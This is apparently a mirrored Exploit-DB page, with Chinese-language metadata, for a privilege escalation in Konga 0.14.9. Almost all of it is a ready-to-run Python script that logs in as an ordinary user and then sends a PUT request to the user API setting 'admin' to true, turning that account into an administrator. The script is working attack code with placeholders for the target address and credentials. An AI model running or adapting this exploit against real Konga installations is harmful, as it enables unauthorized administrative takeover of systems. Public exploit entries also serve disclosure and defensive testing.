KONGA 0.14.9 – Privilege Escalation

• Exploit Database
• 112 阅读

• 作者： Fabricio Salomao
  日期： 2021-11-15
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50521/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55

  # Exploit Title: KONGA 0.14.9 - Privilege Escalation # Date: 10/11/2021 # Exploit Author: Fabricio Salomao & Paulo Trindade (@paulotrindadec) # Vendor Homepage: https://github.com/pantsel/konga # Software Link: https://github.com/pantsel/konga/archive/refs/tags/0.14.9.zip # Version: 0.14.9 # Tested on: Linux - Ubuntu 20.04.3 LTS (focal)       import requests import json   urlkonga = "http://www.example.com:1337/" # change to your konga address identifier = "usernormalkonga"# change user password = "changeme" # change password   headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Content-Type": "application/json;charset=utf-8", "connection-id": "", "Origin": urlkonga, "Referer": urlkonga }   url = urlkonga+"login"   data = { "identifier":identifier, "password":password }   response = requests.post(url, json=data) json_object = json.loads(response.text) print("[+] Attack") print("[+] Token " + json_object["token"])   url2 = urlkonga+"api/user/"+str(json_object["user"]["id"]) id = json_object["user"]["id"] print("[+] Exploiting User ID "+str(json_object["user"]["id"]))   data2 = { "admin": "true", "passports": { "password": password, "protocol": "local" }, "password_confirmation": password, "token":json_object["token"] }   print("[+] Change Normal User to Admin") response2 = requests.put(url2, headers=headers, json=data2) print("[+] Success")